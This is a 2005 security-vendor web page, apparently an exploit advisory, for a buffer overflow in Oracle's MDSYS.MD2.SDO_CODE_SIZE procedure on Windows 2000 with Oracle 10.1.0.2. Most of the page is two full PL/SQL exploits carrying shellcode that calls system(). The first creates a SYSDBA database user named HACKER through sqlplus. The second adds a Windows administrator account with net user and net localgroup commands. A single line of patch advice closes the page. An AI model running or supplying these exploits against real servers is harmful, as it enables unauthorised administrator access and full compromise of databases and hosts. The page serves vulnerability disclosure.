|
Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Oracle Exploit Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Details It is possible to create a database user with DBA privileges or a local Windows administrator account by using a buffer overflow in the procedure MDSYS.MD2.SDO_CODE_SIZE. Example for Windows 2000 SP4 + Oracle 10.1.0.2 --Create a database user HACKER with SYSDBA privileges DECLARE a BINARY_INTEGER; -- return value VC VARCHAR2(32767); BEGIN VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH' || CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227) /* 83C3 09 ADD EBX,9 FFE3 JMP EBX */ || CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB /* userenv.dll 78E35AFB 4B DEC EBX 78E35AFC FFD3 CALL EBX */ || CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208) /* 36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13] 50 PUSH EAX B8 BF8E0178 MOV EAX,MSVCRT.system FFD0 CALL EAX B8 93830078 MOV EAX,MSVCRT._endthread FFD0 CALL EAX */ || 'echo CREATE USER HACKER IDENTIFIED BY HACKER; > c:\cu.sql'||chr(38)||'echo GRANT DBA TO HACKER; >> c:\cu.sql '||chr(38)||' echo ALTER USER HACKER DEFAULT ROLE DBA; >> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "HACKER" WITH ADMIN OPTION; >> c:\cu.sql'||chr(38)||'echo QUIT >> c:\cu.sql '||chr(38)||' c:\oracle\10.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1> c:\stdout.log 2> c:\stderr.log'; a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC); END; --Create a windows OS user HACKER with administrator privileges DECLARE a BINARY_INTEGER; -- return value VC VARCHAR2(32767); BEGIN VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH' || CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227) /* 83C3 09 ADD EBX,9 FFE3 JMP EBX */ || CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB /* userenv.dll 78E35AFB 4B DEC EBX 78E35AFC FFD3 CALL EBX */ || CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208) /* 36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13] 50 PUSH EAX B8 BF8E0178 MOV EAX,MSVCRT.system FFD0 CALL EAX B8 93830078 MOV EAX,MSVCRT._endthread FFD0 CALL EAX */ || 'net user hacker /add '||chr(38)||' net localgroup Administradores hacker /add '||chr(38)||' net localgroup ORA_DBA hacker /add'; a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC); end; Patch Information Apply the latest patchsets for Oracle alert 68 or later. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |